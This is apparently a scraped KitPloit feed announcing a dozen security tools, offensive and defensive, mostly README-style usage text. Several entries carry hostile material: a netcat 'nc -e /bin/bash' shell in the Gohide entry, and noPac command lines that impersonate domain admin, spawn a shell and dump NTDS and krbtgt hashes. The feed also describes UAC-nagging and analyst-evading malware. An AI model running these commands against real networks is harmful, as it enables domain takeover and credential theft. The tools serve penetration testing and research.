Normal view

There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection

By: Zion3R
15 September 2022 at 11:30


This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the intruduction can be found here:


List user processes

PS > PS C:\temp> SharpImpersonation.exe list


List only elevated processes

PS > PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>


Inject base64 encoded shellcode into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>


Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>


Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser


SDomDiscover - A Easy-To-Use Python Tool To Perform DNS Recon

By: Zion3R
14 September 2022 at 11:30



   _____ ____                  ____  _                               
/ ___// __ \____ ____ ___ / __ \(_)_____________ _ _____ _____
\__ \/ / / / __ \/ __ `__ \/ / / / / ___/ ___/ __ \ | / / _ \/ ___/
___/ / /_/ / /_/ / / / / / / /_/ / (__ ) /__/ /_/ / |/ / __/ /
/____/_____/\____/_/ /_/ /_/_____/_/____/\___/\____/|___/\___/_/

A easy-to-use python tool to perform dns recon with multiple options

Installation:

It can be installed in any OS with python3

Manual installation

git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt

One-liner

git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py

Usage:

Common usages

To see the help panel and other parameters

python3 SDomDiscover.py -h

Main usage of the tool to dump the valid domains in the SSL certificate

python3 SDomDiscover.py -d example.com

Used to perform all the queries and recognizement

python3 SDomDiscover.py -d domain.com --all


Pinecone - A WLAN Red Team Framework

By: Zion3R
13 September 2022 at 11:30


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

[email protected]:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, that can be seen typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop command when the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines

By: Zion3R
12 September 2022 at 11:30


PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery.


The Why

Why writing such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command line equivalent, I did not find it a good fit for me. Plus, some of the techniques I implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy to use, GUI based tool with lots of already implemented features, Autoruns is the way to go, otherwise let PersistenceSniper have a shot, it won't miss it :)

Usage

Using PersistenceSniper is as simple as:

PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence

If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:

Get-Help -Name Find-AllPersistence -Full

PersistenceSniper's Find-AllPersistence returns an array of objects of type PSCustomObject with the following properties:

This allows for easy output formatting and filtering. Let's say you only want to see the persistences that will allow the attacker to regain access as NT AUTHORITY\SYSTEM (aka System):
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"


Of course, being PersistenceSniper a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView in order to have a GUI-based table to interact with.


Interpreting results

As already introduced, Find-AllPersistence outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:

  • ComputerName: this is fairly straightforward. If you run Find-AllPersistence without a -ComputerName parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;
  • Technique: this is the name of the technique itself, as it's commonly known in the community;
  • Classification: this property can be used to quickly identify techniques based on their MITRE ATT&CK technique and subtechnique number. For those techniques which don't have a MITRE ATT&CK classification, other classifications are used, the most common being Hexacorn's one since a lot of techniques were discovered by him. When a technique's source cannot be reliably identified, the "Uncatalogued Technique N.#" classification is used;
  • Path: this is the path, on the filesystem or in the registry, at which the technique has been implanted;
  • Value: this is the value of the registry property the techniques uses, or the name of the executable/library used, in case it's a technique which relies on planting something on the filesystem;
  • Access Gained: this is the kind of access the technique grants the attacker. If it's a Run key under HKCU for example, the access gained will be at a user level, while if it's under HKLM it will be at system level;
  • Note: this is a quick explanation of the technique, so that its workings can be easily grasped;
  • Reference: this is a link to a more in-depth explanation of the technique, should the analyst need to study it more.

Dealing with false positives

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legimately used, many indeed are by legit software which needs to autorun on system boot or user login.

This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:

  • Not having to manage a whitelist of persistences which can be tedious and error-prone;
  • Tailoring the false positives to the organizations, and their organizational units, which use the tool;
  • Making it harder for attackers who want to blend in false positives by not publicly disclosing them in the tool's code.

Find-AllPersistence comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.

PS C:\> Find-AllPersistence -DiffCSV false_positives.csv

 

Looking for persistences by taking incremental snapshots

One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.

Persistence techniques implemented so far

The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:

Credits

The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:

I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.

License

This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.



Nim-RunPE - A Nim Implementation Of Reflective PE-Loading From Memory

By: Zion3R
11 September 2022 at 11:30


A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.

You'll need to install the following dependencies:

nimble install ptr_math winim

I did test this with Nim Version 1.6.2 only, so use that version for testing or I cannot guarantee no errors when using another version.


Compile

If you want to pass arguments on runtime or don't want to pass arguments at all compile via:

nim c NimRunPE.nim

If you want to hardcode custom arguments modify const exeArgs to your needs and compile with:

nim c -d:args NimRunPE.nim - this was contributed by @glynx, thanks!

😎

More Information

The technique itself it pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)



If you plan to load e.g. Mimikatz with this technique - make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know it's strange but a fact. If you compile on your own it will still work:


 

My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.



GraphCrawler - GraphQL Automated Security Testing Toolkit

By: Zion3R
10 September 2022 at 12:30


Graph Crawler is the most powerful automated testing toolkit for any GraphQL endpoint.

NEW: Can search for endpoints for you using Escape Technology's powerful Graphinder tool. Just point it towards a domain and add the '-e' option and Graphinder will do subdomain enumeration + search popular directories for GraphQL endpoints. After all this GraphCrawler will take over and work through each find.

It will run through and check if mutation is enabled, check for any sensitive queries available, such as users and files, and it will also test any easy queries it find to see if authentication is required.

If introspection is not enabled on the endpoint it will check if it is an Apollo Server and then can run Clairvoyance to brute force and grab the suggestions to try to build the schema ourselves. (See the Clairvoyance project for greater details on this). It will then score the findings 1-10 with 10 being the most critical.

If you want to dig deeper into the schema you can also use graphql-path-enum to look for paths to certain types, like user IDs, emails, etc.

I hope this saves you as much time as it has for me


Usage

python graphCrawler.py -u https://test.com/graphql/api -o <fileName> -a "<headers>"


██████╗ ██████╗ █████╗ ██████╗ ██╗ ██╗ ██████╗██████╗ █████╗ ██╗ ██╗██╗ ███████╗██████╗
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║██║ ██╔════╝██╔══██╗
██║ ███╗██████╔╝███████║██████╔╝███████║██║ ██████╔╝███████║██║ █╗ ██║██║ █████╗ ██████╔╝
██║ ██║██╔══██╗██╔══██║██╔═══╝ ██╔══██║██║ ██╔══██╗██╔══██║██║███╗██║██║ ██╔══╝ ██╔══██╗
╚██████╔╝██║ ██║██║ ██║██║ ██║ ██║╚██████╗██║ ██║██║ ██║╚███╔███╔╝███████╗███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝

The output option is not required and by default it will output to schema.json

Example output:

Requirements

  • Python3
  • Docker
  • Install all Python dependencies with pip

Wordlist from google-10000-english

TODO

  • Add option for "full report" following the endpoint search where it will run clairvoyance and all other aspects of the toolkit on the endpoints found
  • Default to "simple scan" to just find endpoints when this feature is added
  • Way Future: help craft queries based of the shema provided


Gohide - Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption

By: Zion3R
9 September 2022 at 12:30


Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

  • Session Cookie HTTP GET (http-client)
  • Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
  • WebSocket Handshake "Sec-WebSocket-Key" (websocket-client)
  • WebSocket Handshake "Sec-WebSocket-Accept" (websocket-server)
  • No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.


Usage

[email protected]:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")

Scenario

Box A - Reverse Handler.

[email protected]:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081

Box B - Target.

[email protected]:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091

Note: /etc/hosts "127.0.0.1 target.com"

Box B - Netcat /bin/bash

[email protected]:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A - Netcat client

[email protected]:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide

Obfuscation Samples

websocket-client (Box A to Box B)

  • Sec-WebSocket-Key contains AES-GCM encrypted content e.g. "uname -a".
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13

websocket-server (Box B to Box A)

  • Sec-WebSocket-Accept contains AES-GCM encrypted output.
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

http-client

  • Session cookie header contains AES-GCM encrypted content
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

http-server

  • Set-Cookie header contains AES-GCM encrypted content.
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

none

8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA

 


 

Future

  • Fix up error handling.

Enjoy~



ForceAdmin - Create Infinite UAC Prompts Forcing A User To Run As Admin

By: Zion3R
8 September 2022 at 12:30


ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings.


Screenshots


Required

For building on your own, the following NuGet packages are needed

  • Fody: "Extensible tool for weaving .net assemblies."
  • Costura.Fody "Fody add-in for embedding references as resources."
  • Microsoft.AspNet.WebApi.Client "This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Download the project:

$ git clone https://github.com/catzsec/ForceAdmin.git

Enter the project folder

$ cd ForceAdmin

Run ForceAdmin:

$ dotnet run

Compile ForceAdmin:

$ dotnet publish -r win-x64 -c Release -o ./publish/

⚠ONLY USE FOR EDUCATIONAL PURPOSES⚠

Any questions, errors or solutions, create an Issue in the Issues tab.



Coercer - A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine Through 9 Methods

By: Zion3R
7 September 2022 at 12:30


A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.

Features

  • Automatically detects open SMB pipes on the remote machine.
  • Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
  • Analyze mode with --analyze, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication.
  • Perform coerce attack on a list of targets from a file with --targets-file
  • Coerce to a WebDAV target with --webdav-host and --webdav-port

Usage

$ ./Coercer.py -h                                                                                                  

______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v1.6
\____/\____/\___/_/ \___/\___/_/ by @podalirius_

usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
(-t TARGET | -f TARGETS_FILE) [--target-ip ip address]

Automatic windows authentication coercer over various RPC calls.

options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to authenticate to the endpoint.
-p PASSWORD, --password PASSWORD
Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
-d DOMAIN, --domain DOMAIN
Windows domain name to authenticate to the endpoint.
--hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
--no-pass Don't ask for password (useful for -k)
-v, --verbose Verbose mode (default: False)
-a, --analyze Analyze mode (default: Attack mode)
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-t TARGET, --target TARGET
IP address or hostname of the target machine
-f TARGETS_FILE, --targets-file TARGETS_FILE
IP address or hostname of the target machine
--target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it

-l LISTENER, --listener LISTENER
IP address or hostname of the listener machine
-wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
WebDAV IP of the server to authenticate to.
-wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
WebDAV port of the server to authenticate to.

Example output

In attack mode (without --analyze option) you get the following output:


After all the RPC calls, you get plenty of authentications in Responder:


Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

Credits



noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User

By: Zion3R
6 September 2022 at 12:30


Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Changed from sam-the-admin.


Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.

optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-ol d-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used

execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)< br/> -share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding used (codec) from the target's output (default "GBK").
-service-name service_name
The name of theservice used to trigger the payload

dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-use r-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap .

GetST

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203

 

Auto get shell

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 

 

Dump hash

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt


Scanner

python scanner.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203


MAQ = 0

Method 1

Find the computer that can be modified by the current user.

AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user  -recmute

 

Exp: add -no-add and target with -target-name.

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell


 Warning!! Do not modify the password of the computer in the domain through ldaps or samr, it may break the trust relationship between the computer and the primary domain !!

Method 2

Find CreateChild account, and use the account to exploit.

AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute

Exp: add -create-child

python noPac.py cgdomain.com/venus:'[email protected]' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child


Aura - Python Source Code Auditing And Static Analysis On A Large Scale

By: Zion3R
5 September 2022 at 11:30

Source code auditing and static code analysis

Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of the source code and implement secure coding practices with a focus on auditing 3rd party code such as python package dependencies
  • allow researches to scan code repositories on a large scale, create datasets and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Feature list:

  • Suitable for analyzing malware with a guarantee of a zero-code execution
  • Advanced deobfuscation mechanisms by rewriting the AST tree - constant propagations, code unrolling, and other dirty tricks
  • Recursive scanning automatically unpacks archives such as zips, wheels, etc.. and scans the content
  • Support scanning also non-python files - plugins can work in a “raw-file” mode such as the built-in Yara integration
  • Scan for hardcoded secrets, passwords, and other sensitive information
  • Custom diff engine - you can compare changes between different data sources such as typosquatting PyPI packages to what changes were made
  • Works for both Python 2.x and Python 3.x source code
  • High performance, designed to scan the whole PyPI repository
  • Output in numerous formats such as pretty plain text, JSON, SQLite, SARIF, etc…
  • Tested on over 4TB of compressed python source code
  • Aura is able to report on code behavior such as network communication, file access, or system command execution
  • Compute the “Aura score” telling you how trustworthy the source code/input data is
  • and much much more…

Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, ranging from a set of data analyzers, transport protocols to custom out formats.


Installation

# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full

Or just use a prebuild docker image sourcecodeai/aura:dev

Running Aura

docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses a so-called URIs to identify the protocol and location to scan, if no protocol is used, the scan argument is treated as a path to the file or directory on a local system.

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find most popular typosquatted packages (you need to call aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10
Python source code auditing and static analysis on a large scale (10)

Why Aura?

While there are other tools with functionality that overlaps with Aura such as Bandit, dlint, semgrep etc. the focus of these alternatives is different which impacts the functionality and how they are being used. These alternatives are mainly intended to be used in a similar way to linters, integrated into IDEs, frequently run during the development which makes it important to minimize false positives and reporting with clear actionable explanations in ideal cases.

Aura on the other hand reports on ** behavior of the code**, anomalies, and vulnerabilities with as much information as possible at the cost of false positive. There are a lot of things reported by aura that are not necessarily actionable by a user but they tell you a lot about the behavior of the code such as doing network communication, accessing sensitive files, or using mechanisms associated with obfuscation indicating a possible malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as antivirus, IDS, or firewalls that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to only python (target) source code and python version under which the tool is installed.
    • Aura can analyze both binary (or non-python code) and python source code as well. Able to analyze a mixture of python code compatible with different python versions (py2k & py3k) using the same Aura installation.
  • reporting:
    • Other SAST tools - Aims at integrating well with other systems such as IDEs, CI systems with actionable results while trying to minimize false positives to prevent overwhelming users with too many non-significant alerts.
    • Aura - reports as much information as possible that is not immediately actionable such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readable.
  • configuration:
    • Other SAST tools - The tools are fine-tuned to the target project by customizing the signatures to target specific technologies used by the target project. The overriding configuration is often possible by inserting comments inside the source code such as # nosec that will suppress the alert at that position
    • Aura - it is expected that there is little to no knowledge in advance about the technologies used by code that is being scanned such as auditing a new python package for approval to be used as a dependency in a project. In most cases, it is not even possible to modify the scanned source code such as using comments to indicate to linter or aura to skip detection at that location because it is scanning a copy of that code that is hosted at some remote location.

Authors & Contributors

Donate

LICENSE

Aura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:

@misc{Carnogursky2019thesis,
AUTHOR = "CARNOGURSKY, Martin",
TITLE = "Attacks on package managers [online]",
YEAR = "2019 [cit. 2020-11-02]",
TYPE = "Bachelor Thesis",
SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
SUPERVISOR = "Vit Bukac",
URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}


BeatRev - POC For Frustrating/Defeating Malware Analysts

By: Zion3R
4 September 2022 at 11:30


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim it AES encrypts the actual payload(an RDLL) using environmental data from that victim. Each subsequent time the malware is ran it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt/the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

